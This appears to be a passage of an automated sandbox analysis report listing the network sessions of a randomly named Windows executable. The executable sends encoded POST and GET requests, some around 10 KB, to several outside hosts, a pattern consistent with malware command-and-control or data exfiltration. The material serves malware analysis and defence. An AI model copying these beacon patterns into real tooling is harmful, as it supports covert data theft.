                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49797 | 209.74.79.40 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:39.828026056 CET | 709 | OUT | POST /sd58/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.yous.website
                                                                                                                                                                                                                                              Referer: http://www.yous.website/sd58/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=ndot/dTus2/h2Mxnxf0Zuu/k84u7CkJEsEY0wdQAGrhp0BWpDDzKrr+wXQbAsKBuuDwJqFibQGSrhcmxxyDsyclkDoc/EmakhGQb/zxjIon/5zzj4dKCKP2tDMqoysgvBr+U8IcXnGxsGvhq+rAFQngfW5EnMiEH18YgRUhwmGUE+OryMQxxeRhyxMfo2XGr6J2NFYxH1bJGsmMhk17l4vY=
Dec 23, 2024 04:08:41.037542105 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:40 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49805 | 209.74.79.40 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:42.491025925 CET | 10791 | OUT | POST /sd58/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.yous.website
                                                                                                                                                                                                                                              Referer: http://www.yous.website/sd58/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:08:43.781328917 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:43 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49811 | 209.74.79.40 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:45.144273996 CET | 423 | OUT | GET /sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:08:46.360881090 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:46 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49827 | 202.95.11.110 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:52.079603910 CET | 695 | OUT | POST /qiu4/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.mirenzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.mirenzhibo.net/qiu4/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=VD/pgzsqb5LKHQcYXZm1+ItpcrqiqyH6sXpTJJaMP3QDIown26F0a+6CcbzoTj2mkGHzrmnmxyalfiDGuvSqENhPQ4ILNIqrSmHEsqMdd6uSMYl3tRiyTW02I3A6ggoPOy9MVM5NE8gNoI+Dd3d535qyt5uTUvKnP2QHogHmzS8FuhAQi83W77boAxJQEEXRHw==
Dec 23, 2024 04:08:53.623078108 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:53 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49836 | 202.95.11.110 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:54.747037888 CET | 715 | OUT | POST /qiu4/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.mirenzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.mirenzhibo.net/qiu4/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=VD/pgzsqb5LKHxsYV4m14otqA7qikiH+sXtTJIvBPlkDIJAnx7F0We6CU7zXdD2TkGDRrmbmxy+lfgbGuYmpGdhJW4INQ4qrSmHEsrs3d62SNp13vzazQW01AXA6rAoLOy8ZVNljE6kNoIODTC9+tpqwp5vGf+7uJj5k2jHI9DIqiHNKzNWBp7/bd2AkJHqYc7bloxh6fpEenaFn4H6iSQ0=
Dec 23, 2024 04:08:56.288230896 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49842 | 202.95.11.110 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:08:57.422233105 CET | 10797 | OUT | POST /qiu4/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.mirenzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.mirenzhibo.net/qiu4/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Data Ascii: 4v7= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49850 | 202.95.11.110 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:00.111288071 CET | 425 | OUT | GET /qiu4/?4v7=YBXJjFFON5DPMwFVWr+hwJljRIjxpgK+/QxKc43NeU4JKf8f+IoPZInAdaP+cGuotGfyq3307yGnLgei346rHNdmY6IWbN+gRmHxztRtQ7iWQPlqqkvpfgI=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:09:01.789521933 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Data Ascii: ffc0<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta charset="gb2312"><title>&#40635;&#36771;&#30452;&#25773;&#27704;&#20037;&#20813;&#36153;&#29256;&#24212;&#29992;&#19979;&#36733;&#31449;&#40635;&#36771;&#30452;&#25773;&#23448;&#26041;&#19979;&#36733;v1.2.001-</title><meta name="shenma-site-verification" content="2cc3f179526d8b55faf4b5ea962c450a_1578036476"><meta name="description" content="&#40635;&#36771;&#30452;&#25773;APP&#26159;&#19968;&#27454;&#38598;&#23089;&#20048;&#31038;&#20132;&#20114;&#21160;&#20110;&#19968;&#20307;&#30340;&#30452;&#25773;&#24179;&#21488;,&#26088;&#22312;&#20026;&#29992;&#25143;&#25552;&#20379;&#20016;&#23500;&#22810;&#26679;&#30340;&#30452;&#25773;&#20869;&#23481;&#21644;&#39640;&#21697;&#36136;&#30340;&#35266;&#30475;&#20307;&#39564;&#26080;&#35770;&#29992;&#25143;&#26159;&#23547;&#25214;&#25165;&#33402;&#23637;&#31034;&#29983;&#27963;&#20998;&#20139;&#36824;&#26159;&#30693;&#35782;&#202 [TRUNCATED]
Dec 23, 2024 04:09:01.789597034 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: ;&#37117;&#33021;&#28385;&#36275;&#40635;&#36771;&#30452;&#25773;"><meta name="keywords" content="&#40635;&#36771;&#30452;&#25773;,&#40635;&#36771;&#30452;&#25773;app&#19979;&#36733;,&#40635;&#36771;&#30452;&#25773;&#23448;&#26041;&#2636
Dec 23, 2024 04:09:01.789674044 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: ; var bIsIpad = ua.match(/ipad/i) == "ipad"; var bIsIphoneOs = ua.match(/iphone os/i) == "iphone os"||ua.match(/iphone; cpu os/i) == "iphone; cpu os"; var bIsAndroid = ua.match(/android/i) == "android"; var bIsW
Dec 23, 2024 04:09:01.789711952 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: bo.net/uenlb/"></a><a class="n20248 nav-link " href="http://www.mirenzhibo.net/binc/"></a><a class="o510a4 nav-link " href="http://www.mirenzhibo.net/djs/"></a><a class="p0a89d nav-link " href="http://www.mirenzhibo.net/ym
Dec 23, 2024 04:09:01.789762974 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: "><img draggable="73611f" class="z1d086 pic" src="/game-img/image_171.jpg" alt=" v3.5.2"><ins draggable="c3d9e2"></ins><small dropzone="aaeea6"></small><sup date-time="c2812f"></sup><dl class="ab7b58 con"><dt><h1 class="bd11f0 title">&#40635;
Dec 23, 2024 04:09:01.789799929 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: 706858.png" alt=""></li><li><img dropzone="510a43" src="/template/news/go/addons/code/20231109024706718.png" alt=""></li><li><img date-time="0a89d6" src="/template/news/go/addons/code/20231109024706557.png" alt=""></li><li><i
Dec 23, 2024 04:09:01.789870024 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: </h3><p>1.</p><p>2.</p><p>3.</p><p>4.</p><h3 class="l78b4e rt"></h3><p>1.
Dec 23, 2024 04:09:01.789908886 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: dir="2a056e"></ins><small lang="219ef5"></small><sup draggable="c72d10"></sup><div draggable="98879c" class="t2b35a section-hd"><h3 class="u4b5e5 title"></h3></div><time dropzone="4406c9"></time><tt date-time="994047"></tt><var dir
Dec 23, 2024 04:09:01.789948940 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: c="/game-img/image_122.jpg" alt=""><map dropzone="4f6638"></map><bdo date-time="9c3bbf"></bdo><dfn dir="95efec"></dfn><div date-time="105098" class="e68078 tit"></div><fo
Dec 23, 2024 04:09:01.789988041 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: 45"></font><div dir="380e68" class="m831c0 tit"></div><ins dropzone="6f2d1f"></ins><small date-time="8cfd0e"></small><sup dir="2ba551"></sup><div lang="78b4ed" class="ncbf49 btn btn-link"></di
Dec 23, 2024 04:09:01.909727097 CET | 1236 | IN
                                                                                                                                                                                                                                              Data Ascii: able="fa208d"></time><div draggable="c628e0" class="vc244c btn btn-link"></div></a></li><li class="w113c7 item"><a href="http://wwg.hblbs.cn/l/9.html"><img dropzone="6b7521" class="x95333 pic lazy" src="/game-img/image_124.jpg" dat


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49889 | 199.59.243.227 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:16.764659882 CET | 674 | OUT | POST /w4ic/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.sob.rip
                                                                                                                                                                                                                                              Referer: http://www.sob.rip/w4ic/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=/QSdZodQSk9Ga+zTxY2TE6NH6V/KzmzYXzw2WFXGeXWFOR1jG49+WcjdU1A+p+JtxKBDbIlmdkzX3rrZnFJBBN0VGpRTIUcpnvI9ZcJfCq98W35UZYfJGSXSCnHqQrIwvsunTUT9d36ti3RCzw5EuFFgWsBJMPVWue2rIf5u/P9HTXQbYRqXhmhLvy49+IJqdw==
Dec 23, 2024 04:09:17.847529888 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:16 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                                                              x-request-id: 0793a80b-2237-44cb-a731-80eb880ac602
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==
                                                                                                                                                                                                                                              set-cookie: parking_session=0793a80b-2237-44cb-a731-80eb880ac602; expires=Mon, 23 Dec 2024 03:24:17 GMT; path=/
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 23, 2024 04:09:17.847604036 CET | 547 | IN
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDc5M2E4MGItMjIzNy00NGNiLWE3MzEtODBlYjg4MGFjNjAyIiwicGFnZV90aW1lIjoxNzM0OTIzMz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49897 | 199.59.243.227 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:19.427659988 CET | 694 | OUT | POST /w4ic/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.sob.rip
                                                                                                                                                                                                                                              Referer: http://www.sob.rip/w4ic/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=/QSdZodQSk9GZfjT9beTTKNE11/KhmzEXz82WAnWZlyFO15jF9B+RcjdbVA3neJmxKE+bJJmdknX3v7ZmylAAd0LNJRRXkcpnvI9Zcd1CuR8KXJUf9jKOyXVS3HqCbI8vsvyTQbbd1yti3BCzkNH1VFmL8AKIOkBucX7C8hC1P5fWRdBJgLAzmF4y1xJzL0jG6gzFDwsO+geXaU6TwqZrzk=
Dec 23, 2024 04:09:20.511162043 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:19 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                                                              x-request-id: 9a373364-4084-42f5-bf96-6789ccd72283
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==
                                                                                                                                                                                                                                              set-cookie: parking_session=9a373364-4084-42f5-bf96-6789ccd72283; expires=Mon, 23 Dec 2024 03:24:20 GMT; path=/
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 23, 2024 04:09:20.511205912 CET | 547 | IN
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWEzNzMzNjQtNDA4NC00MmY1LWJmOTYtNjc4OWNjZDcyMjgzIiwicGFnZV90aW1lIjoxNzM0OTIzMz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49903 | 199.59.243.227 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:22.085154057 CET | 10776 | OUT | POST /w4ic/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.sob.rip
                                                                                                                                                                                                                                              Referer: http://www.sob.rip/w4ic/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Data Ascii: 4v7= [TRUNCATED]
Dec 23, 2024 04:09:23.180619001 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:22 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                                                              x-request-id: 145aefb2-d1c7-42bf-8667-82fa82c9bdb9
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==
                                                                                                                                                                                                                                              set-cookie: parking_session=145aefb2-d1c7-42bf-8667-82fa82c9bdb9; expires=Mon, 23 Dec 2024 03:24:23 GMT; path=/
                                                                                                                                                                                                                                              connection: close
